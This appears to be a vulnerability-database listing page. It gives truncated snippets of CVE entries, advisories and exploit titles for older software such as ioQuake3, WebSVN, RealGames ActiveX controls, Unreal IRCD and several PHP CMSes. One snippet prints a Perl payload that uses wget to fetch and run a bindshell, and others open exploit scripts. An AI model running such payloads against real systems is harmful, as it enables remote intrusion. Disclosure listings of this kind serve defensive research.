CVE-2011-1412

sys/sysunix.c in the ioQuake3 engine on Unix and Linux, as used in World of Padman 1.5.x before 1.5.1.1 and OpenArena 0.8.x-15 and 0.8.x-16, allows remote game servers to execute arbitrary commands via shell metacharacters in a long fsgame variable...

WebSVN 2.3.2 Unproper Metacharacters Escaping exec() Remote Commands Injection Vulnerability

WebSVN 2.3.2 Unproper Metacharacters Escaping exec Remote Commands Injection Vulnerability tested against: Microsoft Windows Server R2 SP2 PHP 5.3.6 VC9 with magicquotesgpc = off default Apache 2.2.17 VC9 Introduction: This is a very special vulnerabilty, given the incredibly high number of...

RealNetworks RealGames StubbyUtil.ShellCtl.1 ActiveX Control (InstallerDlg.dll v2.6.0.445) Multiple Remote Commands Execution and Code Execution Vulnerabilities

RealNetworks RealGames StubbyUtil.ShellCtl.1 ActiveX Control InstallerDlg.dll v2.6.0.445 Multiple Remote Commands Execution and Code Execution Vulnerabilities tested against Internet Explorer 9, Vista sp2 download url: http://www.gamehouse.com/ background: When choosing to play with theese online...

RealNetworks RealGames StubbyUtil.ProcessMgr.1 ActiveX Control (InstallerDlg.dll v2.6.0.445) Multiple Remote Commands Execution Vulnerabilities

RealNetworks RealGames StubbyUtil.ProcessMgr.1 ActiveX Control InstallerDlg.dll v2.6.0.445 Multiple Remote Commands Execution Vulnerabilities tested against Internet Explorer 9, Vista sp2 download url: http://www.gamehouse.com/ background: When choosing to play with theese online games ex. the ga...

CVE-2010-4098

Summary: CVE-2010-4098 affects monotone prior to 0.48.1. When configured to allow remote commands, an empty argument to the mtn command could cause a remote denial of service (server crash). Root cause: improper handling of an empty argument in remote-command mode. Impact: remote crash of the mon...

DEBIAN-CVE-2010-3485

SQL injection vulnerability in common.php in LightNEasy 3.2.1 allows remote attackers to execute arbitrary SQL commands via the userhandle cookie to LightNEasy.php, a different vector than CVE-2008-6593. NOTE: the provenance of this information is unknown; the details are obtained solely from thi...

Unreal IRCD 3.2.8.1 Remote Download / Execute Trojan

!/usr/bin/perl Unreal3.2.8.1 Remote Downloader/Execute Trojan DO NOT DISTRIBUTE -PRIVATE- -iHaq 2l8 use Socket; use IO::Socket; Payload options my $payload1 = 'AB; cd /tmp; wget http://packetstormsecurity.org/groups/synnergy/bindshell-unix -O bindshell; chmod +x bindshell; ./bindshell &'; my...

CVE-2009-2936

DISPUTED The Command Line Interface aka Server CLI or administration interface in the master process in the reverse proxy server in Varnish before 2.1.0 does not require authentication for commands received through a TCP port, which allows remote attackers to 1 execute arbitrary code via a...

Rockwell Automation Allen-Bradley MicroLogix PLC authentication and authorization vulnerabilities

Overview Rockwell Automation Allen-Bradley MicroLogix programmable logic controllers PLCs do not adequately authenticate or authorize remote connections or commands. An attacker with network access can obtain the management password or issue commands that bypass the authentication mechanism...

Sql injection

The NETTCPLISTEN function in net.c in Zabbix Agent before 1.6.7, when running on FreeBSD or Solaris, allows remote attackers to bypass the EnableRemoteCommands setting and execute arbitrary commands via shell metacharacters in the argument to net.tcp.listen. NOTE: this attack is limited to attack...

Pirch IRC 98 Client (response) Remote BOF Exploit (SEH)

Exploit for windows platform in category remote exploits ======================================================= Pirch IRC 98 Client response Remote BOF Exploit SEH ======================================================= !/usr/bin/python Usage : python pirch.py | || | / \ | | | | | | | | | - | | ...

Family Connections <= 1.8.2 Remote Shell Upload Exploit

Exploit for unknown platform in category web applications ======================================================= Family Connections include include include include include include include int socketconnectchar server, int port int fd; struct sockaddrin sock; struct hostent host; memset&sock, 0,...

Family Connections 1.8.2 - Arbitrary File Upload

Family Connections 1.8.2 - Arbitrary File Upload / Family Connections include include include include include include include int socketconnectchar server, int port int fd; struct sockaddrin sock; struct hostent host; memset&sock, 0, sizeofsock; iffd = socketAFINET, SOCKSTREAM, 0 haddr;...

Wili-CMS 0.4.0 Multiple Vulnerabilities &#40;Remote/Local File Inclusion - Authentication Bypass&#41;

Salvatore "drosophila" Fresta + Application: Wili-CMS + Version: 0.4.0 + Website: http://wili-cms.sourceforge.net/ + Bugs: A Multiple Remote/Local File Inclusion B Authentication Bypass + Exploitation: Remote + Date: 06 Mar 2009 + Discovered by: Salvatore "drosophila" Fresta + Author: Salvatore...

blindblog 1.3.1 - SQL Injection / Authentication Bypass / Local File Inclusion

Salvatore "drosophila" Fresta + Application: BlindBlog + Version: 1.3.1 + Website: http://sourceforge.net/projects/cbblog/ + Bugs: A SQL Injection B Authentication Bypass C Local File Inclusion + Exploitation: Remote + Date: 03 Mar 2009 + Discovered by: Salvatore "drosophila" Fresta + Author:...

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)

Exploit for unknown platform in category web applications ======================================================================== fuzzylime cms 3.01 polladd.php poll Remote Code Execution Exploit pl ======================================================================== !/usr/bin/perl...

Debian Security Advisory DSA 002-1 (fsh)

The remote host is missing an update to fsh announced via advisory DSA 002-1. SPDX-FileCopyrightText: 2008 E-Soft Inc. Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

GuppY <= 4.5.16 Remote Commands Execution Exploit

Exploit for unknown platform in category web applications ================================================= GuppY 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" "...

SendCard &lt;= 3.4.0 Unauthorized Administrative Access Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo "SendCard = 3.4.0 unauthorized administrative access / remote commands\n"; echo "execution exploit\n"; echo "by rgod [email protected]\n"; echo "site: http://retrogod.altervista.org\n"; echo "dork: "Powered by sendcard...

PT-2006-6711 · Dragon · Dragon Calendar / Events Listing

Name of the Vulnerable Software and Affected Versions: Dragon Calendar / Events Listing versions 2.x Description: The issue allows remote attackers to execute arbitrary SQL commands. This can be achieved via the username or password parameter to the "admin login.asp" API endpoint, the ID paramete...